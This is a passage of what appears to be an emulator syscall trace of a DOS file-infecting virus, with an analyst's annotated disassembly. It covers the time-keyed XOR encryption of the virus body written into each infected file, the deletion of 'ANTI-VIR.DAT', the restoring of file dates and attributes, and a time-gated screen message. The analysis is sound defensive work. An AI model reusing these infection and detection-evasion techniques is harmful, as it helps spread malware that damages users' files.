0x12c47: xor ax, dx                      ; same 16-bit key for every word
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5                   ; 0x2f5 = 757 bytes, matches "Write 757 bytes" at PC 12c61
0x12c4f: lea dx, word ptr [bp + 0x4e7]   ; the XORed copy is what gets written
2018-12-25T11:55:28.748600542Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:55:28.752902215Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-25T11:55:28.762894194Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:55:28.765894867Z 66 PC: 12c7d | Move file pointer
2018-12-25T11:55:28.768292362Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:28.775946333Z 87 PC: 12c9c | Get or set file date and time
2018-12-25T11:55:28.778093276Z 62 PC: 12ca0 | Close file
2018-12-25T11:55:28.788090336Z 67 PC: 12caf | Get or set file attributes
2018-12-25T11:55:28.793647139Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.796982461Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.80141557Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.812728074Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.821048308Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.828840426Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.830013569Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.83177124Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.833865995Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.835910377Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.845974621Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.849946205Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.851620953Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.858921449Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.860481968Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.869326621Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.874580035Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.877550249Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.888945214Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.896270191Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.903175307Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.90529589Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.90793891Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.910185145Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.914021455Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.922739899Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.925599621Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.927597658Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.934966868Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.93651654Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.945646046Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.95161935Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.954465111Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.965569975Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.972809148Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.979841981Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.98133787Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.9845966Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.987020953Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.990157063Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.999287925Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:29.001995338Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:29.003244203Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:29.011712438Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.013284934Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.022107899Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.027706809Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.030448046Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:29.041249963Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:29.049294725Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:29.056543942Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:29.058106669Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:29.061465145Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:29.063770652Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:29.067372945Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:29.078390365Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:29.081565916Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:29.083135225Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:29.091303217Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.093000739Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.101681827Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.106834256Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.109777817Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:29.119534318Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:29.126598588Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:29.134454285Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:29.136124015Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:29.139017013Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:29.143256393Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:29.152368034Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:29.161078033Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:29.1643547Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:29.166302318Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:29.173588132Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.17578969Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.184798907Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.190140128Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.193712337Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:29.205051543Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:29.212479727Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:29.219700439Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:29.221586694Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:29.224317238Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:29.226889229Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:29.230425774Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:29.239100723Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:29.241880382Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:29.244144763Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:29.251451699Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.253135346Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.262462605Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.268037921Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.271950648Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:29.283662965Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:29.291075393Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:29.298152863Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:29.300274232Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:29.308061902Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:29.313216438Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:29.316348164Z 59 PC: 12aa1 | Change current directory
2018-12-25T11:55:29.320837084Z 71 PC: 12abe | Get current directory
2018-12-25T11:55:29.329199233Z 59 PC: 12ae8 | Change current directory
2018-12-25T11:55:29.342114137Z 59 PC: 12b03 | Change current directory
2018-12-25T11:55:29.344001879Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5
; Analyst note: time-gated display routine, executed right after the Get time
; call (trace op 44 = INT 21h AH=2Ch, which returns DH=seconds, DL=hundredths).
; The compare above treats DX as one unsigned 16-bit value, so the routine only
; runs when seconds == 0 and hundredths <= 5; most runs take the skip branch.
; The excerpt stops at 0x12b2f, before the code at the join point completes.
0x12b0a: ja 0x12b2e                      ; DX > 5 (unsigned): skip the display, nothing visible happens
0x12b0c: mov ax, 0xd                     ; AH=00h set video mode, AL=0Dh (320x200, 16 colours)
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]   ; SI -> zero-terminated text at bp+0x3a4 (its content is not in this trace)
0x12b15: cld                             ; string reads go forward
0x12b16: lodsb al, byte ptr [si]         ; AL = next character
0x12b17: or al, al                       ; a zero byte ends the text
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe                     ; INT 10h AH=0Eh teletype output
0x12b1d: xor bh, bh                      ; display page 0
0x12b1f: mov bl, 5                       ; foreground colour 5 (honoured in graphics modes)
0x12b21: int 0x10
0x12b23: jmp 0x12b15                     ; back for the next character
0x12b25: xor ax, ax                      ; INT 16h AH=00h blocks until a key is pressed;
0x12b27: int 0x16                        ; an emulator that supplies no keystroke will stall here
0x12b29: mov ax, 3                       ; AH=00h, AL=03h: back to 80x25 text mode
0x12b2c: int 0x10
0x12b2e: push ax                         ; both paths rejoin here; what follows is outside the excerpt
0x12b2f: push bp                         ; (the next logged call is Set disk transfer address at PC 12b3e)
2018-12-25T11:55:29.346237628Z 26 PC: 12b3e | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":5819,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:29.957750698Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:55:29.959381685Z 71 PC: 12a88 | Get current directory
2018-12-25T11:55:29.962630998Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T11:55:29.969047592Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:55:29.977858255Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:29.989629969Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:29.995603829Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:30.000900241Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:30.005236186Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:30.008948751Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:30.015844293Z 78 PC: 12a90 | Find first file
2018-12-25T11:55:30.028579058Z 67 PC: 12b92 | Get or set file attributes
2018-12-25T11:55:30.048043595Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:30.061209847Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:30.07015236Z 66 PC: 12bf4 | Move file pointer
2018-12-25T11:55:30.071826761Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:55:30.074602001Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
; Analyst note: the instruction above stores DX from Get time (trace op 44 =
; INT 21h AH=2Ch; DH=seconds, DL=hundredths) at bp+0x40f. The loop below uses
; that word as a 16-bit XOR key, so the 757-byte block written at PC 12c61
; differs from one infected file to the next. The 21 bytes written first come
; straight from bp+0x105 with no transformation visible in this excerpt
; (presumably the part that stays comparable across samples; confirm on disk).
0x12c23: mov cx, 0x15                    ; 0x15 = 21 bytes, matches "Write 21 bytes" at PC 12c2d
0x12c26: lea dx, word ptr [bp + 0x105]   ; buffer for the first write
0x12c2a: pop ax                          ; function code taken from the stack, not an immediate; the trace logs op 64 (AH=40h, write)
0x12c2b: int 0x21
0x12c2d: push ax                         ; push the call's result, then ...
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001   ; ... overwrite that stack slot with 0x4001 (AH=40h)
0x12c36: pop bp                          ; BP restored; 0x4001 is left on top of the stack, presumably for a later pop ax
0x12c37: mov cx, 0x17b                   ; 0x17b = 379 words = 758 bytes to transform
0x12c3a: mov dx, word ptr [bp + 0x40f]   ; reload the saved time word as the key
0x12c3e: lea si, word ptr [bp + 0x11a]   ; source starts right after the 21-byte block (0x105 + 0x15)
0x12c42: lea di, word ptr [bp + 0x4e7]   ; destination: separate buffer, the source is left as it was
0x12c46: lodsw ax, word ptr [si]
0x12c47: xor ax, dx                      ; same 16-bit key for every word
0x12c49: stosw word ptr es:[di], ax
0x12c4a: loop 0x12c46
0x12c4c: mov cx, 0x2f5                   ; 0x2f5 = 757 bytes, matches "Write 757 bytes" at PC 12c61
0x12c4f: lea dx, word ptr [bp + 0x4e7]   ; the XORed copy is what gets written
2018-12-25T11:55:30.077917253Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:55:30.081110891Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-25T11:55:30.090623675Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:55:30.094293564Z 66 PC: 12c7d | Move file pointer
2018-12-25T11:55:30.09622408Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:30.103925801Z 87 PC: 12c9c | Get or set file date and time
2018-12-25T11:55:30.1060411Z 62 PC: 12ca0 | Close file
2018-12-25T11:55:30.116039248Z 67 PC: 12caf | Get or set file attributes
2018-12-25T11:55:30.122378035Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.125610384Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.129474927Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.140446083Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.14787173Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.15264666Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.153867933Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.155676917Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.159795699Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.163243256Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.172104625Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.176315533Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.17799999Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.185410315Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.188022412Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.197755347Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.202835082Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.206098841Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.21641346Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.224072583Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.2316031Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.234222604Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.237296599Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.240034411Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.244275523Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.253582547Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.256608556Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.258927896Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.266311956Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.267990545Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.276858823Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.282762052Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.286117063Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.297570365Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.306136391Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.314344986Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.316329963Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.321204346Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.324919639Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.328906604Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.338853283Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.342054243Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.343787311Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.352157506Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.354041762Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.363052962Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.368404755Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.372042045Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.383365334Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.391925168Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.400600757Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.402554328Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.405431291Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.408290727Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.41176429Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.421162654Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.425536697Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.427726931Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.435530933Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.438297871Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.447308406Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.452924003Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.457686807Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.466086764Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.476006599Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.485404041Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.488105211Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.491209023Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.493858424Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.503799722Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.512931374Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.51583357Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.517762696Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.525750487Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.527697869Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.537208976Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.542783748Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.54617723Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.558464123Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.5659166Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.573417373Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:30.575790256Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:30.57845835Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:30.581064044Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:30.58539283Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:30.594197858Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:30.597407863Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:30.600052123Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:30.607833798Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.609511408Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.615806649Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.619981379Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.622430145Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:30.630289122Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:30.63624625Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:30.641487954Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:30.642919888Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:30.65167327Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:30.65553968Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:30.657675291Z 59 PC: 12aa1 | Change current directory
2018-12-25T11:55:30.661885303Z 71 PC: 12abe | Get current directory
2018-12-25T11:55:30.664516996Z 59 PC: 12ae8 | Change current directory
2018-12-25T11:55:30.673076603Z 59 PC: 12b03 | Change current directory
2018-12-25T11:55:30.675681786Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5
; Analyst note: time-gated display routine, executed right after the Get time
; call (trace op 44 = INT 21h AH=2Ch, which returns DH=seconds, DL=hundredths).
; The compare above treats DX as one unsigned 16-bit value, so the routine only
; runs when seconds == 0 and hundredths <= 5; most runs take the skip branch.
; The excerpt stops at 0x12b2f, before the code at the join point completes.
0x12b0a: ja 0x12b2e                      ; DX > 5 (unsigned): skip the display, nothing visible happens
0x12b0c: mov ax, 0xd                     ; AH=00h set video mode, AL=0Dh (320x200, 16 colours)
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]   ; SI -> zero-terminated text at bp+0x3a4 (its content is not in this trace)
0x12b15: cld                             ; string reads go forward
0x12b16: lodsb al, byte ptr [si]         ; AL = next character
0x12b17: or al, al                       ; a zero byte ends the text
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe                     ; INT 10h AH=0Eh teletype output
0x12b1d: xor bh, bh                      ; display page 0
0x12b1f: mov bl, 5                       ; foreground colour 5 (honoured in graphics modes)
0x12b21: int 0x10
0x12b23: jmp 0x12b15                     ; back for the next character
0x12b25: xor ax, ax                      ; INT 16h AH=00h blocks until a key is pressed;
0x12b27: int 0x16                        ; an emulator that supplies no keystroke will stall here
0x12b29: mov ax, 3                       ; AH=00h, AL=03h: back to 80x25 text mode
0x12b2c: int 0x10
0x12b2e: push ax                         ; both paths rejoin here; what follows is outside the excerpt
0x12b2f: push bp                         ; (the next logged call is Set disk transfer address at PC 12b3e)
2018-12-25T11:55:30.677928803Z 26 PC: 12b3e | Set disk transfer address